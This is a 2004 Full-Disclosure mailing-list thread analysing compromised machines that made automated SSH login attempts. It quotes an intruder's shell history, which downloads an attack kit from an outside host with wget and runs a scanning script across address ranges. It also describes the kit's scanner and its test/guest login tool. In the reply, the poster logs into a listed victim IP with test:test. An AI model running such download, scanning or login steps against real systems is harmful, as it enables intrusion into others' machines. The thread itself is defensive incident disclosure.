Re: Re: Automated SSH login attempts?

[Dagur Valberg Johannsson <dagurvj () gmail com>]

What I find interesting is that the file vuln.txt contained a list of
IP addresses that seem to have been exploited. I tryed to login to one
of them with user/pass test:test

dagur@rivendale ssh $ ssh 161.53.223.3 -l test
Password: 
Linux zagreb 2.4.26-grsec #1 SMP Thu Apr 15 17:27:27 CEST 2004 i686 GNU/Linux

Connection to 161.53.223.3 closed.

On Thu, 29 Jul 2004 18:38:15 +0200, Stefan Janecek
<stefan.janecek () jku at> wrote:
> Hmmm - I have also been getting those login attemps, but thought them to
> be harmless. Maybe they are not *that* harmless, though... Today I
> managed to get my hands on a machine that was originating such login
> attempts. I must admit I am far from being a linux security expert, but
> this is what I've found out up to now:
>
> Whoever broke into the machine did not take any attempts to cover up his
> tracks - this is what I found in /root/.bash_history:
>
> ------
> id
> uname -a
> w
> id
> ls
> wgte frauder.us/linux/ssh.tgz
> wget frauder.us/linux/ssh.tgz
> tar xzvf ssh.tgz
> tar xvf ssh.tgz
> ls
> cd ssh
> ls
> ../go.sh 195.178
> ls
> pico uniq.txt
> vi uniq.txt
> ls
> rm -rf uniq.txt
> ../go.sh 167.205
> ls
> rm -rf uniq.txt  vuln.txt
> ../go.sh 202.148.20
> ../go.sh 212.92
> ../go.sh 195.197
> ../go.sh 147.32
> ../go.sh 213.168
> ../go.sh 134.176
> ../go.sh 195.83
> ------
>
> um-hum. I downloaded 'ssh.tgz', it contains the script go.sh and two
> binaries:
>
> go.sh:
> -------
> ../ss 22 -b $1 -i eth0 -s 6
> cat bios.txt |sort | uniq > uniq.txt
> ../sshf
> -------
>
> * 'ss' apparently is some sort of portscanner
> * 'sshf' connects to every IP in uniq.txt and tries to log in as user
> 'test' first, then as user 'guest' (according to tcpdump).
>
> This does not seem to be a stupid brute force attack, as there is only
> one login attempt per user. Could it be that the tool tries to exploit
> some vulnerability in the sshd, and just tries to look harmless by using
> 'test' and 'guest' as usernames?
>
> The compromised machine was running an old debian woody installation
> which had not been upgraded for at least one year, the sshd version
> string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10'
>
> As already mentioned, I am far from being an expert, but if I can assist
> in further testing, then let me know. Please CC me, I am not subscribed
> to the list.
>
> cheers,
> Stefan
>
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html